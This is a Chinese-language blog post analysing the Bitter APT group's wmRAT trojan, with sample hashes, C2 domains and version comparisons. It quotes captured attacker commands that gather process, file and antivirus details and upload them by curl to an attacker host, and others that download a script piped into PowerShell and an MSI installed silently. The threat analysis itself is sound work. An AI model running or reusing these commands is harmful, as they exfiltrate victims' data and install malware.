

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Demo">
  <meta name="keywords" content="">
  
    <meta name="description" content="蔓灵花的wmRAT于2022年被首次披露，披露时远控指令只有16个，并且有一半的指令无实际功能，之后多次捕捉到更新版本，表明蔓灵花组织正在积极开发该远控木马。 基本攻击流程如下：  其中计划任务下载的脚本程序会随请求的次数发生变化，以下是捕获的命名为cnv.oz的脚本命令 123456789cd C:\Users\public\documentstasklist &gt; list_file.lo">
<meta property="og:type" content="article">
<meta property="og:title" content="蔓灵花组织wmRAT">
<meta property="og:url" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/index.html">
<meta property="og:site_name" content="Demo_博客">
<meta property="og:description" content="蔓灵花的wmRAT于2022年被首次披露，披露时远控指令只有16个，并且有一半的指令无实际功能，之后多次捕捉到更新版本，表明蔓灵花组织正在积极开发该远控木马。 基本攻击流程如下：  其中计划任务下载的脚本程序会随请求的次数发生变化，以下是捕获的命名为cnv.oz的脚本命令 123456789cd C:\Users\public\documentstasklist &gt; list_file.lo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822094500300.png">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822143420980.png">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822155341674.png">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822162404526.png">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822162920099.png">
<meta property="og:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/屏幕截图.png">
<meta property="article:published_time" content="2024-10-10T06:36:23.000Z">
<meta property="article:modified_time" content="2024-10-10T06:39:03.599Z">
<meta property="article:author" content="Demo">
<meta property="article:tag" content="wmRAT">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://wangchenchina.github.io/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822094500300.png">
  
  
  
  <title>蔓灵花组织wmRAT - Demo_博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"wangchenchina.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Demo_博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/bbs/">
                <i class="iconfont icon-notebook"></i>
                留言板
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="蔓灵花组织wmRAT"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-10-10 14:36" pubdate>
          2024年10月10日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">蔓灵花组织wmRAT</h1>
            
            
              <div class="markdown-body">
                
                <p>蔓灵花的wmRAT于2022年被首次披露，披露时远控指令只有16个，并且有一半的指令无实际功能，之后多次捕捉到更新版本，表明蔓灵花组织正在积极开发该远控木马。</p>
<p>基本攻击流程如下：</p>
<p><img src="/2024/10/10/%E8%94%93%E7%81%B5%E8%8A%B1%E7%BB%84%E7%BB%87wmRAT/image-20240822094500300.png" srcset="/img/loading.gif" lazyload alt="image-20240822094500300"></p>
<p>其中计划任务下载的脚本程序会随请求的次数发生变化，以下是捕获的命名为cnv.oz的脚本命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> C:\Users\public\documents<br>tasklist &gt; list_file.log<br><span class="hljs-built_in">dir</span> %userprofile%\desktop /f &gt;&gt; list_file.log<br><span class="hljs-built_in">dir</span> %userprofile%\documents /f &gt;&gt; list_file.log<br><span class="hljs-built_in">dir</span> %userprofile%\downloads /f &gt;&gt; list_file.log<br>fsutil fsinfo drives &gt;&gt; list_file.log<br>wmic / namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName &gt;&gt; list_file.log<br>curl -X POST -F <span class="hljs-string">&quot;file=@C:\users\public\documents\list_file.log&quot;</span> http://www.edgardesignstudio.com/zdamup.php?ma=%computername%.%username%<br>del list_file.log<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl http://www.edgardesignstudio.com/zdamup.php?ma=mzz<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl -o %temp%\svc.log https://northgenstudios.com/hvc.log<br>more %temp%\svc.log | powershell<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl -o C:\<span class="hljs-built_in">users</span>\public\music\sys.msi http://edgardesignstudio.com/gsh/systu.msi<br>msiexec /i C:\<span class="hljs-built_in">users</span>\public\music\sys.msi /qn /norestart<br></code></pre></td></tr></table></figure>

<p>指令4下载的sys.msi将会释放wmRat。指令3将释放<a target="_blank" rel="noopener" href="https://havocframework.com/">Havoc</a>生成的shellcode，在此不作描述。</p>
<h3 id="样本比较"><a href="#样本比较" class="headerlink" title="样本比较"></a>样本比较</h3><table>
<thead>
<tr>
<th align="center"></th>
<th align="center">ssve.exe</th>
<th align="center">MSI2729.tmp</th>
<th align="center">mvwes.exe</th>
</tr>
</thead>
<tbody><tr>
<td align="center">MD5</td>
<td align="center">F70358C0F33C793FF763F36AB0F94D89</td>
<td align="center">968DEFFE020C8A2A8C50AECBFCC8B420</td>
<td align="center">997A70907948909CBE387D0BF7DE7218</td>
</tr>
<tr>
<td align="center">sha1</td>
<td align="center">3ABA103F2D243AF44C0AB715956D2C0D0A9A58D8</td>
<td align="center">108E492BCB176054D858A8618631559C9C198895</td>
<td align="center">6318B57D44C9EFA56357157DCB1A8A84617DCDD6</td>
</tr>
<tr>
<td align="center">编译时间</td>
<td align="center">2022-12-12</td>
<td align="center">2023-12-11</td>
<td align="center">2024-06-07</td>
</tr>
<tr>
<td align="center">发现时间</td>
<td align="center">2023年3月</td>
<td align="center">2024年3月</td>
<td align="center">2024年8月</td>
</tr>
<tr>
<td align="center">C2域名</td>
<td align="center">jjwappconsole.com</td>
<td align="center">evtessentials.com</td>
<td align="center">umsmssvc.com</td>
</tr>
</tbody></table>
<h4 id="ssve-exe"><a href="#ssve-exe" class="headerlink" title="ssve.exe"></a>ssve.exe</h4><p>样本采集于客户主机，发现较早，结构、功能较简单</p>
<p>主函数如下</p>
<img src="image-20240822143420980.png" srcset="/img/loading.gif" lazyload alt="image-20240822143420980" style="zoom:80%;" />

<p>利用C++的全局变量初始化机制，将字符串的解密函数插入到启动函数mainCRTStartup中initterm所在的函数指针表下。</p>
<img src="image-20240822155341674.png" srcset="/img/loading.gif" lazyload alt="image-20240822155341674" style="zoom:80%;" />

<h4 id="MSI2729-tmp"><a href="#MSI2729-tmp" class="headerlink" title="MSI2729.tmp"></a>MSI2729.tmp</h4><p>主函数如下</p>
<img src="image-20240822162404526.png" srcset="/img/loading.gif" lazyload alt="image-20240822162404526" style="zoom:80%;" />

<p>这一版本在增加指令的基础上，增加了获取系统时区，获取杀软信息的操作</p>
<h4 id="mvwes-exe"><a href="#mvwes-exe" class="headerlink" title="mvwes.exe"></a>mvwes.exe</h4><img src="image-20240822162920099.png" srcset="/img/loading.gif" lazyload alt="image-20240822162920099" style="zoom:80%;" />

<p>这一版本同样增加完善了指令集，对关键指令和字符串进行了简单的移位加密或者异或移位加密</p>
<h3 id="模拟控制端"><a href="#模拟控制端" class="headerlink" title="模拟控制端"></a>模拟控制端</h3><p>以mvwes.exe为例实现控制端</p>
<img src="屏幕截图.png" srcset="/img/loading.gif" lazyload alt="屏幕截图"  />

<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a target="_blank" rel="noopener" href="https://www.viewintech.com/detail?id=126">https://www.viewintech.com/detail?id=126</a></p>
<p><a target="_blank" rel="noopener" href="https://rayblog.rising.com.cn/2024/07/2023%e5%b9%b412%e6%9c%88%ef%bc%9a%e8%94%93%e7%81%b5%e8%8a%b1%e7%bb%84%e7%bb%87%e9%92%88%e5%af%b9%e4%b8%ad%e5%9b%bd%e5%86%9b%e5%b7%a5%e4%bc%81%e4%b8%9a%e7%9a%84%e6%94%bb%e5%87%bb%e4%ba%8b%e4%bb%b6/">2023年12月：蔓灵花组织针对中国军工企业的攻击事件分析报告</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/" class="category-chain-item">样本分析</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/wmRAT/">#wmRAT</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>蔓灵花组织wmRAT</div>
      <div>http://wangchenchina.github.io/2024/10/10/蔓灵花组织wmRAT/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Demo</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年10月10日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/12/%E9%93%B6%E7%8B%90%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/" title="银狐样本分析">
                        <span class="hidden-mobile">银狐样本分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"p4y64BT0Xe4gNN6V3D3J31XG-gzGzoHsz","appKey":"gaaGO0djz3T4tJHrM9kjHYMx","path":"window.location.pathname","placeholder":"随便说点什么吧~兄弟","avatar":"retro","meta":["nick"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <i class="iconfont icon-github-fill"></i> <a href="https://github.com/wangchenChina" target="_blank" rel="nofollow noopener"><span>Github</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
